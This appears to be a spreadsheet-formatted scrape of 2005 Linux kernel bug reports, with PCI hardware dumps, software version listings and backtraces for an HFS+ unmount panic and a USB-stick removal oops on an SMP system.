ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: dfc00000-dfcfffff Prefetchable memory behind bridge: 00000000fff00000-0000000000000000 Secondary status: 66Mhz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag+ Device: Latency L0s unlimited, L1 unlimited Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s, Port 1 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug+ Surpise+ Slot: Number 2, PowerLimit 10.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Unknown, PwrInd Unknown, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Address: fee01004 Data: 40c1 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1c.1 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: dfb00000-dfbfffff Prefetchable memory behind bridge: 00000000fff00000-0000000000000000 Secondary status: 66Mhz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag+ Device: Latency L0s unlimited, L1 unlimited Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s, Port 2 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug+ Surpise+ Slot: Number 3, PowerLimit 10.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Unknown, PwrInd Unknown, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Address: fee01004 Data: 40d1 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 233 Region 4: I/O ports at ff80 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 50 Region 4: I/O ports at ff60 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 58 Region 4: I/O ports at ff40 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 225 Region 4: I/O ports at ff20 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) (prog-if 20 [EHCI]) Subsystem: Dell: Unknown device 0177 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 233 Region 0: Memory at ffa80800 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev d3) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: dfa00000-dfafffff Prefetchable memory behind bridge: 00000000d8000000-00000000d8000000 Secondary status: 66Mhz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [50] #0d [0000] 00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 225 Region 0: I/O ports at ec00 [size=256] Region 1: I/O ports at e8c0 [size=64] Region 2: Memory at dffffa00 (32-bit, non-prefetchable) [size=512] Region 3: Memory at dffff900 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1f.0 ISA bridge: Intel Corporation 82801FB/FR (ICH6/ICH6R) LPC Interface Bridge (rev 03) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) (prog-if 8a [Master SecP PriP]) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at ffa0 [size=16] 00:1f.2 Class 0106: Intel Corporation 82801FR/FRW (ICH6R/ICH6RW) SATA Controller (rev 03) (prog-if 01) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 217 Region 0: I/O ports at fe00 [size=8] Region 1: I/O ports at fe10 [size=4] Region 2: I/O ports at fe20 [size=8] Region 3: I/O ports at fe30 [size=4] Region 4: I/O ports at fea0 [size=16] Region 5: Memory at dffffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) Subsystem: Dell: Unknown device 0177 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at e8a0 [size=32] 01:00.0 VGA compatible controller: ATI Technologies Inc RV370 5B60 [Radeon X300 (PCIE)] (prog-if 00 [VGA]) Subsystem: ATI Technologies Inc: Unknown device 0302 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Interrupt: pin A routed to IRQ 169 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at dc00 [size=256] Region 2: Memory at dfde0000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at dfe00000 [disabled] [size=128K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express Endpoint IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag+ Device: Latency L0s &lt;128ns, L1 &lt;2us Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal+ Fatal+ Unsupported- Device: RlxdOrd+ ExtTag+ PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s L1, Port 0 Link: Latency L0s &lt;128ns, L1 &lt;1us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x16 Capabilities: [80] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [100] Advanced Error Reporting 01:00.1 Display controller: ATI Technologies Inc: Unknown device 5b70 Subsystem: ATI Technologies Inc: Unknown device 0303 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Region 0: Memory at dfdf0000 (32-bit, non-prefetchable) [size=64K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express Endpoint IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;128ns, L1 &lt;2us Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal+ Fatal+ Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s L1, Port 0 Link: Latency L0s &lt;128ns, L1 &lt;1us Link: ASPM Disabled RCB 64 bytes CommClk- ExtSynch- Link: Speed 2.5Gb/s, Width x16 02:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01) Subsystem: Dell: Unknown device 0177 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Interrupt: pin A routed to IRQ 169 Region 0: Memory at dfcf0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: 64bit+ Queue=0/3 Enable- Address: 5ebb2202e76d9714 Data: d3f4 Capabilities: [d0] Express Endpoint IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag+ Device: Latency L0s &lt;4us, L1 unlimited Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 4096 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s, Port 0 Link: Latency L0s &lt;4us, L1 &lt;64us Link: ASPM Disabled RCB 64 bytes CommClk- ExtSynch- Link: Speed 2.5Gb/s, Width x1 Capabilities: [100] Advanced Error Reporting Capabilities: [13c] Virtual Channel 04:00.0 Network controller: Texas Instruments ACX 111 54Mbps Wireless Interface Subsystem: Netgear: Unknown device 4c00 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size 10 Interrupt: pin A routed to IRQ 11 Region 0: Memory at dfade000 (32-bit, non-prefetchable) [size=8K] Region 1: Memory at dfae0000 (32-bit, non-prefetchable) [size=128K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 04:01.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (4000ns min, 10000ns max) Interrupt: pin A routed to IRQ 201 Region 0: Memory at d8001000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 04:01.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (1000ns min, 63750ns max) Interrupt: pin A routed to IRQ 201 Region 0: Memory at d8000000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 04:02.0 FireWire (IEEE 1394): Agere Systems (former Lucent Microelectronics) FW323 (rev 61) (prog-if 10 [OHCI]) Subsystem: Adaptec: Unknown device 0034 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (3000ns min, 6000ns max), Cache Line Size 10 Interrupt: pin A routed to IRQ 58 Region 0: Memory at dfadd000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ Software Environment: -------------------------------------- ver_linux output: Linux localhost.localdomain 2.6.12-1.1387_FC4smp #1 SMP Fri Jul 1 12:55:24 EDT 2005 i686 i686 i386 GNU/Linux Gnu C 4.0.0 Gnu make 3.80 binutils 2.15.94.0.2.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.37 reiserfsprogs line reiser4progs line pcmcia-cs 3.2.8 quota-tools 3.12. PPP 2.4.2 nfs-utils 1.0.7 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 058 Modules Loaded fglrx parport_pc lp parport autofs4 sunrpc ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables video button battery ac md5 ipv6 ohci1394 ieee1394 uhci_hcd ehci_hcd tuner tvaudio bttv video_buf i2c_algo_bit v4l2_common btcx_risc tveeprom videodev snd_bt87x i2c_i801 i2c_core snd_intel8x0 snd_ac97_codec snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc tg3 dm_snapshot dm_zero dm_mirror ext3 jbd dm_mod ata_piix libata sd_mod scsi_mod Problem Description: -------------------------------------- After mounting an HFS+ format CD/DVD and performing normal copy operations, when I unmount it, the system cheerfully panics. Guaranteed. 100% probability of success, at least on this computer (I haven't got any other PCs to test it on, unfortunately, but I did at least verify that Ubuntu as well as FC4 seems to explode in similar fashion under the same circumstances). Being an OS X user ordinarily, I couldn't figure out how to save the panic log to a file on disk, so I copied down the backtrace visible by hand, which I present here for your enjoyment: Badness in panic at kernel/panic.c:119 (Tainted: P ) [&lt;c0121357&gt;] panic+0x1d4/0x1e8 [&lt;c010537d&gt;] die+0x17b/0x185 [&lt;c01055bb&gt;] do_invalid_op+0x0/0xab [&lt;c010565d&gt;] do_invalid_op+0xa2/0xab [&lt;c0260088&gt;] __ide_end_request+0x118/0x125 [&lt;c0166051&gt;] end_bio_bh_io_sync+0x0/0x4f [&lt;c01669f3&gt;] bio_put+0x23/0x2e [&lt;c016607b&gt;] end_bio_bh_io_sync+0x2a/0x4f [&lt;c01674b0&gt;] bio_endio+0x3e/0x69 [&lt;c0147f61&gt;] mempool_free+0x3a/0x73 [&lt;c0214c12&gt;] __add_entropy_words+0x62/0x192 [&lt;c0104bb3&gt;] error_code+0x4f/0x54 [&lt;c0260088&gt;] __ide_end_request+0x118/0x125 [&lt;c026cde0&gt;] cdrom_end_request+0x85/0x136 [&lt;c026df14&gt;] cdrom_pc_intr+0x90/0x219 [&lt;c026d211&gt;] cdrom_timer_expiry+0x0/0x57 [&lt;c0261a6f&gt;] ide_intr+0xb4/0x159 [&lt;c012a076&gt;] update_wall_time+0x14/0x40 [&lt;c026de84&gt;] cdrom_pc_intr+0x0/0x219 [&lt;c0143aed&gt;] handle_IRQ_event+0x2e/0x5a [&lt;c0143bd8&gt;] __do_IRQ+0xbf/0x117 [&lt;c010663a&gt;] do_IRQ+0x4e/0x86 ======================= [&lt;c0104a5a&gt;] common_interrupt+0x1a/0x20 Steps to reproduce: -------------------------------------- 1. Find an HFS+ disc. I used my Knights of the Old Republic DVD, but any OS X install DVD will do. 2. Insert and mount. 3. Perform some random operations. I looked at the DVD contents in Nautilus. 4. Attempt to unmount and suffer. I couldn't find anyone nice enough to try duplicating the bug for me, so I submit it here being the only known case, but this computer will cheerfully reproduce it without fail over and over again. However, the system is absolutely stable under all other circumstances, so I doubt there is a hardware problem at work here, especially given the predictability of the bug.</t>
  </si>
  <si>
    <t>kernel opps when removing usb-stick</t>
  </si>
  <si>
    <t>2.6.12.1 and all before</t>
  </si>
  <si>
    <t>2005-07-07 23:28 UTC</t>
  </si>
  <si>
    <t>Werner Klaus</t>
  </si>
  <si>
    <t>2005-07-20 22:35 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.3 Hardware Environment: PC Dual Xeon 900MHz Software Environment: Standard SuSE 9.3 with SMP Kernel 2.6.12.1 Problem Description: Each time the USB-Stick (or any other usb-storage device) is removed, the kernel oopses with the following messages: Jul 7 15:24:18 arts kernel: hub 3-0:1.0: state 5 ports 5 chg 0000 evt 0004 Jul 7 15:24:18 arts kernel: ehci_hcd 0000:00:11.2: GetStatus port 2 status 001002 POWER sig=se0 CSC Jul 7 15:24:18 arts kernel: hub 3-0:1.0: port 2, status 0100, change 0001, 12 Mb/s Jul 7 15:24:18 arts kernel: usb 3-2: USB disconnect, address 2 Jul 7 15:24:18 arts kernel: usb 3-2: usb_disable_device nuking all URBs Jul 7 15:24:18 arts kernel: usb 3-2: unregistering interface 3-2:1.0 Jul 7 15:24:18 arts kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000050 Jul 7 15:24:18 arts kernel: printing eip: Jul 7 15:24:18 arts kernel: c019829f Jul 7 15:24:18 arts kernel: *pde = 00000000 Jul 7 15:24:18 arts kernel: Oops: 0000 [#1] Jul 7 15:24:18 arts kernel: PREEMPT SMP Jul 7 15:24:18 arts kernel: Modules linked in: nls_iso8859_15 usb_storage subfs nls_cp437 nls_iso8859_1 smbfs usbserial nvram snd_pcm_oss snd_mixer_oss snd_via82xx snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd evdev sg st sr_mod ehci_hcd uhci_hcd usbcore rtc 3c59x sd_mod scsi_mod ide_cd Jul 7 15:24:18 arts kernel: CPU: 0 Jul 7 15:24:18 arts kernel: EIP: 0060:[&lt;c019829f&gt;] Not tainted VLI Jul 7 15:24:18 arts kernel: EFLAGS: 00010292 (2.6.12.1) Jul 7 15:24:18 arts kernel: EIP is at sysfs_hash_and_remove+0xf/0x107 Jul 7 15:24:18 arts kernel: eax: 00000000 ebx: c039e835 ecx: 0000001f edx: 00000000 Jul 7 15:24:18 arts kernel: esi: dd3ffe4c edi: e28bc550 ebp: e28bc4e0 esp: de891da8 Jul 7 15:24:18 arts kernel: ds: 007b es: 007b ss: 0068 Jul 7 15:24:18 arts kernel: Process khubd (pid: 2500, threadinfo=de890000 task=dff11060) Jul 7 15:24:18 arts kernel: Stack: c02203a0 00000202 dd3ffc00 dd3ffe54 dd3ffe4c e28bc550 e28bc4e0 c029a9da Jul 7 15:24:18 arts kernel: 00000000 c039e835 dd3ffe4c dd3ffd98 d5dc4000 c8480040 c029aa00 dd3ffe4c Jul 7 15:24:18 arts kernel: dd3ffc00 e28b1cf8 dd3ffe4c 00000003 dd3ffc00 d5dc4000 d5dc3ff8 e28b1de5 Jul 7 15:24:18 arts kernel: Call Trace: Jul 7 15:24:18 arts kernel: [&lt;c02203a0&gt;] kobject_release+0x0/0x10 Jul 7 15:24:18 arts kernel: [&lt;c029a9da&gt;] class_device_del+0xba/0xd0 Jul 7 15:24:18 arts kernel: [&lt;c029aa00&gt;] class_device_unregister+0x10/0x20 Jul 7 15:24:18 arts kernel: [&lt;e28b1cf8&gt;] scsi_remove_device+0x48/0xb0 [scsi_mod] Jul 7 15:24:18 arts kernel: [&lt;e28b1de5&gt;] __scsi_remove_target+0x85/0xc0 [scsi_mod] Jul 7 15:24:18 arts kernel: [&lt;e28b0c45&gt;] scsi_forget_host+0x45/0x70 [scsi_mod] Jul 7 15:24:18 arts kernel: [&lt;e28a92c9&gt;] scsi_remove_host+0x19/0x80 [scsi_mod] Jul 7 15:24:18 arts kernel: [&lt;e2b77cbd&gt;] storage_disconnect+0x5d/0x79 [usb_storage] Jul 7 15:24:18 arts kernel: [&lt;e2ad6196&gt;] usb_unbind_interface+0x76/0x80 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;c0299288&gt;] device_release_driver+0x78/0x80 Jul 7 15:24:18 arts kernel: [&lt;c029954b&gt;] bus_remove_device+0x7b/0xc0 Jul 7 15:24:18 arts kernel: [&lt;c02982b9&gt;] device_del+0x59/0xb0 Jul 7 15:24:18 arts kernel: [&lt;e2ae034c&gt;] usb_disable_device+0xec/0x1b0 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;e2ad8f4a&gt;] usb_disconnect+0xaa/0x190 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;e2adb30f&gt;] hub_port_connect_change+0x31f/0x520 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;e2adb8c0&gt;] hub_events+0x3b0/0x610 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;e2adbb55&gt;] hub_thread+0x35/0x130 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;c0134140&gt;] autoremove_wake_function+0x0/0x60 Jul 7 15:24:18 arts kernel: [&lt;c0103352&gt;] ret_from_fork+0x6/0x14 Jul 7 15:24:18 arts kernel: [&lt;c0134140&gt;] autoremove_wake_function+0x0/0x60 Jul 7 15:24:18 arts kernel: [&lt;e2adbb20&gt;] hub_thread+0x0/0x130 [usbcore] Jul 7 15:24:18 arts kernel: [&lt;c01014a5&gt;] kernel_thread_helper+0x5/0x10 Jul 7 15:24:18 arts kernel: Code: 03 89 50 04 c7 41 04 00 02 20 00 e9 7a ff ff ff 8d b6 00 00 00 00 8d bf 00 00 00 00 55 57 56 53 83 ec 0c 8b 44 24 20 8b 5c 24 24 &lt;8b&gt; 48 50 8b 50 10 f0 ff 4a 78 0f 88 e8 00 00 00 8b 51 0c 8d 6a This only happens on the above mentioned hardware platform. On other system with the same software setup but single CPU, it doesn`t happen Steps to reproduce: Use SMP system, plug in USB-Stick and the remove it again.</t>
  </si>
  <si>
    <t>panic with hfsplus from iPod</t>
  </si>
  <si>
    <t>2005-07-08 09:41 UTC</t>
  </si>
  <si>
    <t>2005-11-18 12:13 UTC</t>
  </si>
  <si>
